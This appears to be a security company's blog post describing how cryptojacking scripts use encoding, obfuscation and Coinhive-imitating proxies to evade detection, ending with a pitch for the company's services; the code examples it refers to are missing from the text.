In our last article on cryptojacking, we discussed what cryptojacking is and how malicious actors hijack your computing resources to mine cryptocurrency. Since then, “bad guys” have been evolving their in-browser miners to avoid detection and reap more reward from unsuspecting users. Some of these techniques include encoding, obfuscation, and using proxies. None of these techniques are new, but (until recently) they haven’t been previously applied to cryptojacking. “The good guys” at Rubica specialize in detecting and preventing this sort of malicious activity.
Encoding is used in computing to transform data for transportation between systems. It is not meant to keep data a secret but can be used to thwart signature-based detection mechanisms. At Rubica, we have observed actors hex encode their malicious mining scripts, like the one depicted below:
When decoded this part of the script is human readable and appears like so:
Now, you may be thinking “that was easy to decode”, but encoding can be used in tandem with obfuscation to produce code like this:
Obfuscation is intended to make data unreadable, or hard to understand. It makes an analyst’s job harder, because it is time consuming to reverse engineer the code into a human readable format. In this case, we were able to use a debugger to get around a layer of abstraction and find some interesting indicators. This brings us to a discussion of proxies — servers with specialized software that forward client requests to other servers.
When mining cryptocurrency, miners connect to mining pools. These pools facilitate shared processing power and increase the likelihood of a miner completing a block in the blockchain. However, users are charged a fee to participate. In the case of Coinhive, a popular in-browser cryptocurrency mining service, users are charged roughly 30% to participate. Since this fee is significantly higher than what other pools typically charge, we have observed malicious actors registering their own domains and creating proxies that act like Coinhive to connect to alternate mining pools in order to avoid the 30% fee. This equates to slightly more money in the “bad guys” pocket.
This is easy to do thanks to free guides available on Github that show you how to set up the infrastructure using services like Digital Ocean. One guide Rubica found specifically shows users how to avoid AdBlock by changing Coinhive’s global variables:
As you can see cyber criminals are continually changing their tactics, techniques, and procedures (TTPs) in order to bypass defenses. Without Rubica’s advanced cyber security defense measures, you are at high risk of being a victim. Contact the “good guys” at Rubica for more information about and protection from malicious mining.